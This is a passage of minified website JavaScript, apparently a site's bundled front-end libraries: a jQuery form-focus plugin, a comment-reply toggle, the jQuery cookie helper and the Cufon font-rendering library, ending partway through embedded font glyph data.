jQuery.fn.uniform=function(settings){settings=jQuery.extend({valid_class:'valid',invalid_class:'invalid',focused_class:'focused',holder_class:'ctrlHolder',field_selector:'input, select, textarea'},settings);return this.each(function(){var form=jQuery(this);form.find(settings.field_selector).focus(function(){form.find('.'+settings.focused_class).removeClass(settings.focused_class);jQuery(this).parents("."+settings.holder_class).addClass(settings.focused_class)}).blur(function(){form.find('.'+settings.focused_class).removeClass(settings.focused_class);});});};$(document).ready(function(){q=jQuery('form.uniForm');if(q.length){q.uniform();}
$(document.activeElement).focus()});function toggle_comment_form(id){var cform=$('#comment_form_'+id);if(cform.hasClass('hidden')){cform.prev().text("Stop Replying to This Post");cform.slideDown();}
else{cform.prev().text("Reply to This Post");cform.slideUp();}
cform.toggleClass('hidden');}
jQuery.cookie=function(name,value,options){if(typeof value!='undefined'){options=options||{};if(value===null){value='';options.expires=-1;}
var expires='';if(options.expires&&(typeof options.expires=='number'||options.expires.toUTCString)){var date;if(typeof options.expires=='number'){date=new Date();date.setTime(date.getTime()+(options.expires*24*60*60*1000));}else{date=options.expires;}
expires='; expires='+date.toUTCString();}
var path=options.path?'; path='+(options.path):'';var domain=options.domain?'; domain='+(options.domain):'';var secure=options.secure?'; secure':'';document.cookie=[name,'=',encodeURIComponent(value),expires,path,domain,secure].join('');}else{var cookieValue=null;if(document.cookie&&document.cookie!=''){var cookies=document.cookie.split(';');for(var i=0;i<cookies.length;i++){var cookie=jQuery.trim(cookies[i]);if(cookie.substring(0,name.length+1)==(name+'=')){cookieValue=decodeURIComponent(cookie.substring(name.length+1));break;}}}
return cookieValue;}};var Cufon=(function(){var m=function(){return m.replace.apply(null,arguments)};var x=m.DOM={ready:(function(){var C=false,E={loaded:1,complete:1};var B=[],D=function(){if(C){return}C=true;for(var F;F=B.shift();F()){}};if(document.addEventListener){document.addEventListener("DOMContentLoaded",D,false);window.addEventListener("pageshow",D,false)}if(!window.opera&&document.readyState){(function(){E[document.readyState]?D():setTimeout(arguments.callee,10)})()}if(document.readyState&&document.createStyleSheet){(function(){try{document.body.doScroll("left");D()}catch(F){setTimeout(arguments.callee,1)}})()}q(window,"load",D);return function(F){if(!arguments.length){D()}else{C?F():B.push(F)}}})(),root:function(){return document.documentElement||document.body}};var n=m.CSS={Size:function(C,B){this.value=parseFloat(C);this.unit=String(C).match(/[a-z%]*$/)[0]||"px";this.convert=function(D){return D/B*this.value};this.convertFrom=function(D){return D/this.value*B};this.toString=function(){return this.value+this.unit}},addClass:function(C,B){var D=C.className;C.className=D+(D&&" ")+B;return C},color:j(function(C){var B={};B.color=C.replace(/^rgba\((.*?),\s*([\d.]+)\)/,function(E,D,F){B.opacity=parseFloat(F);return"rgb("+D+")"});return B}),fontStretch:j(function(B){if(typeof B=="number"){return B}if(/%$/.test(B)){return parseFloat(B)/100}return{"ultra-condensed":0.5,"extra-condensed":0.625,condensed:0.75,"semi-condensed":0.875,"semi-expanded":1.125,expanded:1.25,"extra-expanded":1.5,"ultra-expanded":2}[B]||1}),getStyle:function(C){var B=document.defaultView;if(B&&B.getComputedStyle){return new a(B.getComputedStyle(C,null))}if(C.currentStyle){return new a(C.currentStyle)}return new a(C.style)},gradient:j(function(F){var G={id:F,type:F.match(/^-([a-z]+)-gradient\(/)[1],stops:[]},C=F.substr(F.indexOf("(")).match(/([\d.]+=)?(#[a-f0-9]+|[a-z]+\(.*?\)|[a-z]+)/ig);for(var E=0,B=C.length,D;E<B;++E){D=C[E].split("=",2).reverse();G.stops.push([D[1]||E/(B-1),D[0]])}return G}),quotedList:j(function(E){var D=[],C=/\s*((["'])([\s\S]*?[^\\])\2|[^,]+)\s*/g,B;while(B=C.exec(E)){D.push(B[3]||B[1])}return D}),recognizesMedia:j(function(G){var E=document.createElement("style"),D,C,B;E.type="text/css";E.media=G;try{E.appendChild(document.createTextNode("/**/"))}catch(F){}C=g("head")[0];C.insertBefore(E,C.firstChild);D=(E.sheet||E.styleSheet);B=D&&!D.disabled;C.removeChild(E);return B}),removeClass:function(D,C){var B=RegExp("(?:^|\\s+)"+C+"(?=\\s|$)","g");D.className=D.className.replace(B,"");return D},supports:function(D,C){var B=document.createElement("span").style;if(B[D]===undefined){return false}B[D]=C;return B[D]===C},textAlign:function(E,D,B,C){if(D.get("textAlign")=="right"){if(B>0){E=" "+E}}else{if(B<C-1){E+=" "}}return E},textShadow:j(function(F){if(F=="none"){return null}var E=[],G={},B,C=0;var D=/(#[a-f0-9]+|[a-z]+\(.*?\)|[a-z]+)|(-?[\d.]+[a-z%]*)|,/ig;while(B=D.exec(F)){if(B[0]==","){E.push(G);G={};C=0}else{if(B[1]){G.color=B[1]}else{G[["offX","offY","blur"][C++]]=B[2]}}}E.push(G);return E}),textTransform:(function(){var B={uppercase:function(C){return C.toUpperCase()},lowercase:function(C){return C.toLowerCase()},capitalize:function(C){return C.replace(/\b./g,function(D){return D.toUpperCase()})}};return function(E,D){var C=B[D.get("textTransform")];return C?C(E):E}})(),whiteSpace:(function(){var D={inline:1,"inline-block":1,"run-in":1};var C=/^\s+/,B=/\s+$/;return function(H,F,G,E){if(E){if(E.nodeName.toLowerCase()=="br"){H=H.replace(C,"")}}if(D[F.get("display")]){return H}if(!G.previousSibling){H=H.replace(C,"")}if(!G.nextSibling){H=H.replace(B,"")}return H}})()};n.ready=(function(){var B=!n.recognizesMedia("all"),E=false;var D=[],H=function(){B=true;for(var K;K=D.shift();K()){}};var I=g("link"),J=g("style");function C(K){return K.disabled||G(K.sheet,K.media||"screen")}function G(M,P){if(!n.recognizesMedia(P||"all")){return true}if(!M||M.disabled){return false}try{var Q=M.cssRules,O;if(Q){search:for(var L=0,K=Q.length;O=Q[L],L<K;++L){switch(O.type){case 2:break;case 3:if(!G(O.styleSheet,O.media.mediaText)){return false}break;default:break search}}}}catch(N){}return true}function F(){if(document.createStyleSheet){return true}var L,K;for(K=0;L=I[K];++K){if(L.rel.toLowerCase()=="stylesheet"&&!C(L)){return false}}for(K=0;L=J[K];++K){if(!C(L)){return false}}return true}x.ready(function(){if(!E){E=n.getStyle(document.body).isUsable()}if(B||(E&&F())){H()}else{setTimeout(arguments.callee,10)}});return function(K){if(B){K()}else{D.push(K)}}})();function s(D){var C=this.face=D.face,B={"\u0020":1,"\u00a0":1,"\u3000":1};this.glyphs=D.glyphs;this.w=D.w;this.baseSize=parseInt(C["units-per-em"],10);this.family=C["font-family"].toLowerCase();this.weight=C["font-weight"];this.style=C["font-style"]||"normal";this.viewBox=(function(){var F=C.bbox.split(/\s+/);var E={minX:parseInt(F[0],10),minY:parseInt(F[1],10),maxX:parseInt(F[2],10),maxY:parseInt(F[3],10)};E.width=E.maxX-E.minX;E.height=E.maxY-E.minY;E.toString=function(){return[this.minX,this.minY,this.width,this.height].join(" ")};return E})();this.ascent=-parseInt(C.ascent,10);this.descent=-parseInt(C.descent,10);this.height=-this.ascent+this.descent;this.spacing=function(L,N,E){var O=this.glyphs,M,K,G,P=[],F=0,J=-1,I=-1,H;while(H=L[++J]){M=O[H]||this.missingGlyph;if(!M){continue}if(K){F-=G=K[H]||0;P[I-1]-=G}F+=P[++I]=~~(M.w||this.w)+N+(B[H]?E:0);K=M.k}P.total=F;return P}}function f(){var C={},B={oblique:"italic",italic:"oblique"};this.add=function(D){(C[D.style]||(C[D.style]={}))[D.weight]=D};this.get=function(H,I){var G=C[H]||C[B[H]]||C.normal||C.italic||C.oblique;if(!G){return null}I={normal:400,bold:700}[I]||parseInt(I,10);if(G[I]){return G[I]}var E={1:1,99:0}[I%100],K=[],F,D;if(E===undefined){E=I>400}if(I==500){I=400}for(var J in G){if(!k(G,J)){continue}J=parseInt(J,10);if(!F||J<F){F=J}if(!D||J>D){D=J}K.push(J)}if(I<F){I=F}if(I>D){I=D}K.sort(function(M,L){return(E?(M>=I&&L>=I)?M<L:M>L:(M<=I&&L<=I)?M>L:M<L)?-1:1});return G[K[0]]}}function r(){function D(F,G){if(F.contains){return F.contains(G)}return F.compareDocumentPosition(G)&16}function B(G){var F=G.relatedTarget;if(!F||D(this,F)){return}C(this,G.type=="mouseover")}function E(F){C(this,F.type=="mouseenter")}function C(F,G){setTimeout(function(){var H=d.get(F).options;m.replace(F,G?h(H,H.hover):H,true)},10)}this.attach=function(F){if(F.onmouseenter===undefined){q(F,"mouseover",B);q(F,"mouseout",B)}else{q(F,"mouseenter",E);q(F,"mouseleave",E)}}}function u(){var C=[],D={};function B(H){var E=[],G;for(var F=0;G=H[F];++F){E[F]=C[D[G]]}return E}this.add=function(F,E){D[F]=C.push(E)-1};this.repeat=function(){var E=arguments.length?B(arguments):C,F;for(var G=0;F=E[G++];){m.replace(F[0],F[1],true)}}}function A(){var D={},B=0;function C(E){return E.cufid||(E.cufid=++B)}this.get=function(E){var F=C(E);return D[F]||(D[F]={})}}function a(B){var D={},C={};this.extend=function(E){for(var F in E){if(k(E,F)){D[F]=E[F]}}return this};this.get=function(E){return D[E]!=undefined?D[E]:B[E]};this.getSize=function(F,E){return C[F]||(C[F]=new n.Size(this.get(F),E))};this.isUsable=function(){return!!B}}function q(C,B,D){if(C.addEventListener){C.addEventListener(B,D,false)}else{if(C.attachEvent){C.attachEvent("on"+B,function(){return D.call(C,window.event)})}}}function v(C,B){var D=d.get(C);if(D.options){return C}if(B.hover&&B.hoverables[C.nodeName.toLowerCase()]){b.attach(C)}D.options=B;return C}function j(B){var C={};return function(D){if(!k(C,D)){C[D]=B.apply(null,arguments)}return C[D]}}function c(F,E){var B=n.quotedList(E.get("fontFamily").toLowerCase()),D;for(var C=0;D=B[C];++C){if(i[D]){return i[D].get(E.get("fontStyle"),E.get("fontWeight"))}}return null}function g(B){return document.getElementsByTagName(B)}function k(C,B){return C.hasOwnProperty(B)}function h(){var C={},B,F;for(var E=0,D=arguments.length;B=arguments[E],E<D;++E){for(F in B){if(k(B,F)){C[F]=B[F]}}}return C}function o(E,M,C,N,F,D){var K=document.createDocumentFragment(),H;if(M===""){return K}var L=N.separate;var I=M.split(p[L]),B=(L=="words");if(B&&t){if(/^\s/.test(M)){I.unshift("")}if(/\s$/.test(M)){I.push("")}}for(var J=0,G=I.length;J<G;++J){H=z[N.engine](E,B?n.textAlign(I[J],C,J,G):I[J],C,N,F,D,J<G-1);if(H){K.appendChild(H)}}return K}function l(D,M){var C=D.nodeName.toLowerCase();if(M.ignore[C]){return}var E=!M.textless[C];var B=n.getStyle(v(D,M)).extend(M);var F=c(D,B),G,K,I,H,L,J;if(!F){return}for(G=D.firstChild;G;G=I){K=G.nodeType;I=G.nextSibling;if(E&&K==3){if(H){H.appendData(G.data);D.removeChild(G)}else{H=G}if(I){continue}}if(H){D.replaceChild(o(F,n.whiteSpace(H.data,B,H,J),B,M,G,D),H);H=null}if(K==1){if(G.firstChild){if(G.nodeName.toLowerCase()=="cufon"){z[M.engine](F,null,B,M,G,D)}else{arguments.callee(G,M)}}J=G}}}var t=" ".split(/\s+/).length==0;var d=new A();var b=new r();var y=new u();var e=false;var z={},i={},w={autoDetect:false,engine:null,forceHitArea:false,hover:false,hoverables:{a:true},ignore:{applet:1,canvas:1,col:1,colgroup:1,head:1,iframe:1,map:1,optgroup:1,option:1,script:1,select:1,style:1,textarea:1,title:1,pre:1},printable:true,selector:(window.Sizzle||(window.jQuery&&function(B){return jQuery(B)})||(window.dojo&&dojo.query)||(window.Ext&&Ext.query)||(window.YAHOO&&YAHOO.util&&YAHOO.util.Selector&&YAHOO.util.Selector.query)||(window.$$&&function(B){return $$(B)})||(window.$&&function(B){return $(B)})||(document.querySelectorAll&&function(B){return document.querySelectorAll(B)})||g),separate:"words",textless:{dl:1,html:1,ol:1,table:1,tbody:1,thead:1,tfoot:1,tr:1,ul:1},textShadow:"none"};var p={words:/\s/.test("\u00a0")?/[^\S\u00a0]+/:/\s+/,characters:"",none:/^/};m.now=function(){x.ready();return m};m.refresh=function(){y.repeat.apply(y,arguments);return m};m.registerEngine=function(C,B){if(!B){return m}z[C]=B;return m.set("engine",C)};m.registerFont=function(D){if(!D){return m}var B=new s(D),C=B.family;if(!i[C]){i[C]=new f()}i[C].add(B);return m.set("fontFamily",'"'+C+'"')};m.replace=function(D,C,B){C=h(w,C);if(!C.engine){return m}if(!e){n.addClass(x.root(),"cufon-active cufon-loading");n.ready(function(){n.addClass(n.removeClass(x.root(),"cufon-loading"),"cufon-ready")});e=true}if(C.hover){C.forceHitArea=true}if(C.autoDetect){delete C.fontFamily}if(typeof C.textShadow=="string"){C.textShadow=n.textShadow(C.textShadow)}if(typeof C.color=="string"&&/^-/.test(C.color)){C.textGradient=n.gradient(C.color)}else{delete C.textGradient}if(!B){y.add(D,arguments)}if(D.nodeType||typeof D=="string"){D=[D]}n.ready(function(){for(var F=0,E=D.length;F<E;++F){var G=D[F];if(typeof G=="string"){m.replace(C.selector(G),C,true)}else{l(G,C)}}});return m};m.set=function(B,C){w[B]=C;return m};return m})();Cufon.registerEngine("canvas",(function(){var b=document.createElement("canvas");if(!b||!b.getContext||!b.getContext.apply){return}b=null;var a=Cufon.CSS.supports("display","inline-block");var e=!a&&(document.compatMode=="BackCompat"||/frameset|transitional/i.test(document.doctype.publicId));var f=document.createElement("style");f.type="text/css";f.appendChild(document.createTextNode(("cufon{text-indent:0;}@media screen,projection{cufon{display:inline;display:inline-block;position:relative;vertical-align:middle;"+(e?"":"font-size:1px;line-height:1px;")+"}cufon cufontext{display:-moz-inline-box;display:inline-block;width:0;height:0;overflow:hidden;text-indent:-10000in;}"+(a?"cufon canvas{position:relative;}":"cufon canvas{position:absolute;}")+"}@media print{cufon{padding:0;}cufon canvas{display:none;}}").replace(/;/g,"!important;")));document.getElementsByTagName("head")[0].appendChild(f);function d(p,h){var n=0,m=0;var g=[],o=/([mrvxe])([^a-z]*)/g,k;generate:for(var j=0;k=o.exec(p);++j){var l=k[2].split(",");switch(k[1]){case"v":g[j]={m:"bezierCurveTo",a:[n+~~l[0],m+~~l[1],n+~~l[2],m+~~l[3],n+=~~l[4],m+=~~l[5]]};break;case"r":g[j]={m:"lineTo",a:[n+=~~l[0],m+=~~l[1]]};break;case"m":g[j]={m:"moveTo",a:[n=~~l[0],m=~~l[1]]};break;case"x":g[j]={m:"closePath"};break;case"e":break generate}h[g[j].m].apply(h,g[j].a)}return g}function c(m,k){for(var j=0,h=m.length;j<h;++j){var g=m[j];k[g.m].apply(k,g.a)}}return function(V,w,P,t,C,W){var k=(w===null);if(k){w=C.alt}var A=V.viewBox;var m=P.getSize("fontSize",V.baseSize);var B=0,O=0,N=0,u=0;var z=t.textShadow,L=[];if(z){for(var U=z.length;U--;){var F=z[U];var K=m.convertFrom(parseFloat(F.offX));var I=m.convertFrom(parseFloat(F.offY));L[U]=[K,I];if(I<B){B=I}if(K>O){O=K}if(I>N){N=I}if(K<u){u=K}}}var Z=Cufon.CSS.textTransform(w,P).split("");var E=V.spacing(Z,~~m.convertFrom(parseFloat(P.get("letterSpacing"))||0),~~m.convertFrom(parseFloat(P.get("wordSpacing"))||0));if(!E.length){return null}var h=E.total;O+=A.width-E[E.length-1];u+=A.minX;var s,n;if(k){s=C;n=C.firstChild}else{s=document.createElement("cufon");s.className="cufon cufon-canvas";s.alt=w;n=document.createElement("canvas");s.appendChild(n);if(t.printable){var S=document.createElement("cufontext");S.appendChild(document.createTextNode(w));s.appendChild(S)}}var aa=s.style;var H=n.style;var j=m.convert(A.height);var Y=Math.ceil(j);var M=Y/j;var G=M*Cufon.CSS.fontStretch(P.get("fontStretch"));var J=h*G;var Q=Math.ceil(m.convert(J+O-u));var o=Math.ceil(m.convert(A.height-B+N));n.width=Q;n.height=o;H.width=Q+"px";H.height=o+"px";B+=A.minY;H.top=Math.round(m.convert(B-V.ascent))+"px";H.left=Math.round(m.convert(u))+"px";var r=Math.max(Math.ceil(m.convert(J)),0)+"px";if(a){aa.width=r;aa.height=m.convert(V.height)+"px"}else{aa.paddingLeft=r;aa.paddingBottom=(m.convert(V.height)-1)+"px"}var X=n.getContext("2d"),D=j/A.height;X.scale(D,D*M);X.translate(-u,-B);X.save();function T(){var x=V.glyphs,ab,l=-1,g=-1,y;X.scale(G,1);while(y=Z[++l]){var ab=x[Z[l]]||V.missingGlyph;if(!ab){continue}if(ab.d){X.beginPath();if(ab.code){c(ab.code,X)}else{ab.code=d("m"+ab.d,X)}X.fill()}X.translate(E[++g],0)}X.restore()}if(z){for(var U=z.length;U--;){var F=z[U];X.save();X.fillStyle=F.color;X.translate.apply(X,L[U]);T()}}var q=t.textGradient;if(q){var v=q.stops,p=X.createLinearGradient(0,A.minY,0,A.maxY);for(var U=0,R=v.length;U<R;++U){p.addColorStop.apply(p,v[U])}X.fillStyle=p}else{X.fillStyle=P.get("color")}T();return s}})());Cufon.registerEngine("vml",(function(){var e=document.namespaces;if(!e){return}e.add("cvml","urn:schemas-microsoft-com:vml");e=null;var b=document.createElement("cvml:shape");b.style.behavior="url(#default#VML)";if(!b.coordsize){return}b=null;var h=(document.documentMode||0)<8;document.write(('<style type="text/css">cufoncanvas{text-indent:0;}@media screen{cvml\\:shape,cvml\\:rect,cvml\\:fill,cvml\\:shadow{behavior:url(#default#VML);display:block;antialias:true;position:absolute;}cufoncanvas{position:absolute;text-align:left;}cufon{display:inline-block;position:relative;vertical-align:'+(h?"middle":"text-bottom")+";}cufon cufontext{position:absolute;left:-10000in;font-size:1px;}a cufon{cursor:pointer}}@media print{cufon cufoncanvas{display:none;}}</style>").replace(/;/g,"!important;"));function c(i,j){return a(i,/(?:em|ex|%)$|^[a-z-]+$/i.test(j)?"1em":j)}function a(l,m){if(m==="0"){return 0}if(/px$/i.test(m)){return parseFloat(m)}var k=l.style.left,j=l.runtimeStyle.left;l.runtimeStyle.left=l.currentStyle.left;l.style.left=m.replace("%","em");var i=l.style.pixelLeft;l.style.left=k;l.runtimeStyle.left=j;return i}function f(l,k,j,n){var i="computed"+n,m=k[i];if(isNaN(m)){m=k.get(n);k[i]=m=(m=="normal")?0:~~j.convertFrom(a(l,m))}return m}var g={};function d(p){var q=p.id;if(!g[q]){var n=p.stops,o=document.createElement("cvml:fill"),i=[];o.type="gradient";o.angle=180;o.focus="0";o.method="sigma";o.color=n[0][1];for(var m=1,l=n.length-1;m<l;++m){i.push(n[m][0]*100+"% "+n[m][1])}o.colors=i.join(",");o.color2=n[l][1];g[q]=o}return g[q]}return function(ac,G,Y,C,K,ad,W){var n=(G===null);if(n){G=K.alt}var I=ac.viewBox;var p=Y.computedFontSize||(Y.computedFontSize=new Cufon.CSS.Size(c(ad,Y.get("fontSize"))+"px",ac.baseSize));var y,q;if(n){y=K;q=K.firstChild}else{y=document.createElement("cufon");y.className="cufon cufon-vml";y.alt=G;q=document.createElement("cufoncanvas");y.appendChild(q);if(C.printable){var Z=document.createElement("cufontext");Z.appendChild(document.createTextNode(G));y.appendChild(Z)}if(!W){y.appendChild(document.createElement("cvml:shape"))}}var ai=y.style;var R=q.style;var l=p.convert(I.height),af=Math.ceil(l);var V=af/l;var P=V*Cufon.CSS.fontStretch(Y.get("fontStretch"));var U=I.minX,T=I.minY;R.height=af;R.top=Math.round(p.convert(T-ac.ascent));R.left=Math.round(p.convert(U));ai.height=p.convert(ac.height)+"px";var F=Y.get("color");var ag=Cufon.CSS.textTransform(G,Y).split("");var L=ac.spacing(ag,f(ad,Y,p,"letterSpacing"),f(ad,Y,p,"wordSpacing"));if(!L.length){return null}var k=L.total;var x=-U+k+(I.width-L[L.length-1]);var ah=p.convert(x*P),X=Math.round(ah);var O=x+","+I.height,m;var J="r"+O+"ns";var u=C.textGradient&&d(C.textGradient);var o=ac.glyphs,S=0;var H=C.textShadow;var ab=-1,aa=0,w;while(w=ag[++ab]){var D=o[ag[ab]]||ac.missingGlyph,v;if(!D){continue}if(n){v=q.childNodes[aa];while(v.firstChild){v.removeChild(v.firstChild)}}else{v=document.createElement("cvml:shape");q.appendChild(v)}v.stroked="f";v.coordsize=O;v.coordorigin=m=(U-S)+","+T;v.path=(D.d?"m"+D.d+"xe":"")+"m"+m+J;v.fillcolor=F;if(u){v.appendChild(u.cloneNode(false))}var ae=v.style;ae.width=X;ae.height=af;if(H){var s=H[0],r=H[1];var B=Cufon.CSS.color(s.color),z;var N=document.createElement("cvml:shadow");N.on="t";N.color=B.color;N.offset=s.offX+","+s.offY;if(r){z=Cufon.CSS.color(r.color);N.type="double";N.color2=z.color;N.offset2=r.offX+","+r.offY}N.opacity=B.opacity||(z&&z.opacity)||1;v.appendChild(N)}S+=L[aa++]}var M=v.nextSibling,t,A;if(C.forceHitArea){if(!M){M=document.createElement("cvml:rect");M.stroked="f";M.className="cufon-vml-cover";t=document.createElement("cvml:fill");t.opacity=0;M.appendChild(t);q.appendChild(M)}A=M.style;A.width=X;A.height=af}else{if(M){q.removeChild(M)}}ai.width=Math.max(Math.ceil(p.convert(k*P)),0);if(h){var Q=Y.computedYAdjust;if(Q===undefined){var E=Y.get("lineHeight");if(E=="normal"){E="1em"}else{if(!isNaN(E)){E+="em"}}Y.computedYAdjust=Q=0.5*(a(ad,E)-parseFloat(ai.height))}if(Q){ai.marginTop=Math.ceil(Q)+"px";ai.marginBottom=Q+"px"}}return y}})());Cufon.registerFont((function(f){var b=_cufon_bridge_={p:[{"d":"67,-113v-34,22,-22,104,25,79v5,-3,10,-8,15,-15xm82,-233v-35,3,-20,50,-7,71v15,-15,27,-27,29,-49v0,-13,-9,-23,-22,-22xm135,-209v-2,34,-21,52,-44,73r38,62r24,-33r24,17r-31,43r29,47r-39,0r-14,-22v-14,14,-27,25,-50,25v-35,0,-59,-33,-58,-70v1,-33,17,-52,37,-73v-29,-37,-34,-120,31,-120v30,0,54,23,53,51","w":183},{"d":"89,-105v7,-36,-24,-60,-42,-33v-4,8,-6,18,-6,33r48,0xm66,-24v17,0,23,-14,23,-33r29,-1v1,36,-17,61,-51,61v-46,0,-56,-35,-56,-90v0,-51,11,-89,54,-89v48,0,56,40,55,96r-79,0v0,30,1,54,25,56","w":130,"k":{"-":-7}},{"d":"72,-146v-24,3,-23,27,-23,60v0,33,-1,56,23,59v24,-3,24,-25,24,-59v0,-34,1,-57,-24,-60xm84,3v-16,0,-27,-8,-34,-20r0,86r-32,0r0,-241r32,0r0,16v6,-13,18,-20,34,-20v39,0,44,41,44,90v0,50,-6,89,-44,89","w":140,"k":{"-":-7}},{"d":"87,-109r0,109r-36,0r0,-109r-48,-148r35,0v10,38,25,71,31,113v8,-40,20,-76,31,-113r36,0","k":{"u":23,"o":23,"i":6,"e":23,"a":23,"O":6,"C":6,"A":6,";":38,":":38,".":48,"-":15,",":48}},{"d":"42,-205v-9,0,-19,-10,-19,-19v0,-9,10,-19,19,-19v9,0,20,9,19,19v1,10,-10,19,-19,19xm95,-205v-9,0,-19,-9,-18,-19v-1,-10,9,-19,18,-19v9,0,20,9,19,19v1,10,-10,19,-19,19xm69,-148v-24,3,-26,28,-26,61v0,33,2,58,26,61v24,-3,26,-28,26,-61v0,-33,-2,-58,-26,-61xm69,3v-43,0,-58,-39,-58,-89v0,-51,14,-90,58,-90v44,0,58,40,58,90v0,50,-14,89,-58,89","w":137},{"d":"105,-187v0,-34,-16,-41,-50,-39r0,79v33,2,50,-7,50,-40xm108,-74v0,-36,-16,-46,-53,-44r0,85v36,1,53,-5,53,-41xm143,-74v0,71,-51,79,-122,74r0,-257v65,-2,118,-2,118,65v0,34,-10,51,-34,60v27,6,38,24,38,58","w":156,"k":{"-":-10}},{"d":"89,-228v-39,6,-39,43,-39,99v0,55,0,93,39,99v39,-7,37,-41,37,-99v0,-56,2,-93,-37,-99xm89,3v-65,0,-74,-53,-74,-131v0,-79,9,-132,74,-132v64,0,72,54,72,132v0,78,-7,131,-72,131","w":176,"k":{"Y":6,"X":6,"T":6,";":-7,":":-7,".":15,"-":-7,",":15}},{"d":"94,-202v0,54,3,77,-32,84r0,54r-31,0v1,-25,-2,-53,1,-76v31,-2,31,-11,31,-49v0,-26,2,-41,-15,-44v-17,2,-15,14,-16,38r-30,0v-1,-42,9,-65,47,-65v37,0,45,18,45,58xm46,3v-11,0,-20,-9,-20,-20v0,-11,9,-20,20,-20v11,0,20,9,20,20v0,11,-9,20,-20,20","w":98},{"d":"81,-153v0,-67,-1,-116,70,-107r0,23v-85,-22,-6,135,-79,144v41,6,35,53,35,101v0,37,8,44,44,43r0,22v-50,1,-70,-11,-70,-64v0,-49,8,-99,-51,-91r0,-22v38,1,51,-11,51,-49","w":180},{"d":"49,-88v-11,0,-20,-8,-20,-19v0,-11,8,-20,20,-20v12,0,20,9,20,20v0,11,-9,19,-20,19xm49,4v-11,0,-20,-9,-20,-20v0,-11,9,-20,20,-20v11,0,20,9,20,20v0,11,-9,20,-20,20","w":97},{"d":"25,67r0,-341r66,0r0,28r-34,0r0,285r34,0r0,28r-66,0","w":98},{"d":"68,-274v59,-8,66,99,23,112v35,8,33,29,33,79v0,60,-4,83,-56,84r0,-28v26,-2,24,-17,24,-51v0,-47,5,-66,-28,-70r0,-25v19,-2,23,-12,23,-35v9,-43,-37,-50,-37,-13r0,221r-31,0r0,-222v0,-33,17,-48,49,-52","w":136,"k":{"-":-7}},{"d":"160,-215r0,97r95,0r0,21r-95,0r0,97r-20,0r0,-97r-95,0r0,-21r95,0r0,-97r20,0","w":299},{"d":"69,-126v23,-3,26,-22,26,-52v0,-30,-3,-51,-27,-51v-23,0,-25,22,-25,51v0,31,2,50,26,52xm126,-173v0,75,-23,105,-57,173r-38,0v16,-29,29,-51,37,-67r21,-44v-38,33,-83,-2,-77,-65v5,-50,11,-84,57,-84v45,0,57,36,57,87"},{"d":"68,-146v-23,4,-23,26,-23,60v0,34,0,56,23,60v24,-4,24,-26,24,-60v0,-34,0,-56,-24,-60xm57,-175v17,-1,27,7,34,19r0,-116r32,0r0,272r-32,0r0,-17v-7,12,-18,20,-34,20v-39,0,-44,-39,-44,-89v0,-51,4,-86,44,-89","w":140},{"d":"129,-129v-1,-67,-7,-99,-71,-95r0,191v63,4,71,-29,71,-96xm164,-128v3,105,-36,136,-141,128r0,-257r46,0v79,2,93,43,95,129","w":178,"k":{"Y":6,"W":6,"V":6,"A":6,";":-7,":":-7,".":15,",":15}},{"d":"13,0r22,-257r31,0r35,178r35,-178r31,0r22,257r-32,0r-10,-180r-35,180r-23,0r-34,-180r-11,180r-31,0","w":201},{"d":"72,-146v-23,4,-23,26,-23,60v0,34,0,56,23,60v24,-4,24,-26,24,-60v0,-34,0,-56,-24,-60xm84,3v-16,0,-27,-8,-34,-20r0,17r-32,0r0,-272r32,0r0,116v6,-13,17,-20,34,-19v39,3,44,39,44,89v0,49,-6,89,-44,89","w":140,"k":{"-":-7}},{"d":"42,-91r-34,-81r33,0r18,49r17,-49r33,0r-33,81r39,91r-33,0r-23,-60r-23,60r-34,0","w":117,"k":{"-":11}},{"d":"20,0r0,-272r32,0r0,272r-32,0","w":72},{"d":"161,-128v0,43,-3,81,-18,104r20,29r-20,15r-19,-26v-75,31,-115,-29,-109,-122v5,-79,9,-132,74,-132v64,0,70,54,72,132xm50,-129v-1,61,2,108,54,96r-22,-32r20,-15r19,26v7,-49,22,-174,-32,-174v-40,0,-38,43,-39,99","w":176,"k":{";":-7,":":-7,"-":-7}},{"d":"73,-146v-14,0,-22,9,-21,26r0,120r-32,0r0,-172r31,0r0,17v17,-30,74,-26,74,24r0,131r-32,0r0,-116v0,-21,-1,-30,-20,-30","w":143},{"d":"253,-116r0,18r-207,85r0,-23r176,-71r-176,-72r0,-22","w":299},{"d":"69,-148v-24,3,-26,28,-26,61v0,33,2,58,26,61v24,-3,26,-28,26,-61v0,-33,-2,-58,-26,-61xm69,3v-43,0,-58,-39,-58,-89v0,-51,14,-90,58,-90v44,0,58,40,58,90v0,50,-14,89,-58,89","w":137,"k":{"-":-7}},{"d":"194,-256r91,98r-27,0r-78,-77r-78,77r-28,0r92,-98r28,0","w":360},{"d":"80,-243v-13,-6,-26,-2,-26,15r0,56r24,0r0,24r-24,0r0,148r-32,0r0,-148r-17,0r0,-24r17,0v-3,-55,-4,-123,58,-100r0,29","w":78,"k":{".":6,",":6}},{"d":"43,-85v0,40,15,70,44,50r0,32v-51,23,-77,-21,-77,-83v0,-60,25,-107,77,-83r0,30v-31,-22,-44,12,-44,54","w":91},{"d":"74,33r-74,-293r25,0r74,293r-25,0","w":99},{"d":"23,0r0,-257r35,0r0,257r-35,0","w":81},{"d":"45,-205v-9,0,-19,-10,-19,-19v0,-9,10,-19,19,-19v9,0,20,9,19,19v1,10,-10,19,-19,19xm98,-205v-9,0,-19,-9,-18,-19v-1,-10,9,-19,18,-19v9,0,20,9,19,19v1,10,-10,19,-19,19xm72,3v-81,0,-45,-106,-53,-175r32,0r0,123v-1,16,7,24,21,24v14,0,21,-9,20,-24r0,-123r33,0v-7,69,28,175,-53,175","w":143},{"d":"23,0r0,-257r32,0r68,179r0,-179r33,0r0,257r-33,0r-68,-180r0,180r-32,0","w":178},{"d":"57,-176v16,0,27,8,34,20r0,-16r32,0r0,172r-32,0r0,-17v-7,12,-18,20,-34,20v-37,0,-44,-41,-44,-89v1,-47,6,-90,44,-90xm68,-146v-24,3,-23,27,-23,60v0,34,0,56,23,60v23,-4,24,-26,24,-60v-1,-34,1,-57,-24,-60","w":140},{"d":"89,-45v0,42,-44,59,-79,42r0,-33v12,15,51,16,49,-10v-2,-28,-49,-46,-49,-81v0,-40,42,-60,75,-42r0,33v-9,-16,-48,-16,-45,8v3,29,49,44,49,83","w":98,"k":{"-":-7}},{"d":"60,-147r0,-40r-35,20r-8,-15r35,-20r-35,-20r8,-15r35,20r0,-40r17,0r0,40r35,-20r8,15r-34,20r34,20r-8,15r-35,-20r0,40r-17,0","w":137},{"d":"72,3v-81,0,-45,-106,-53,-175r32,0r0,123v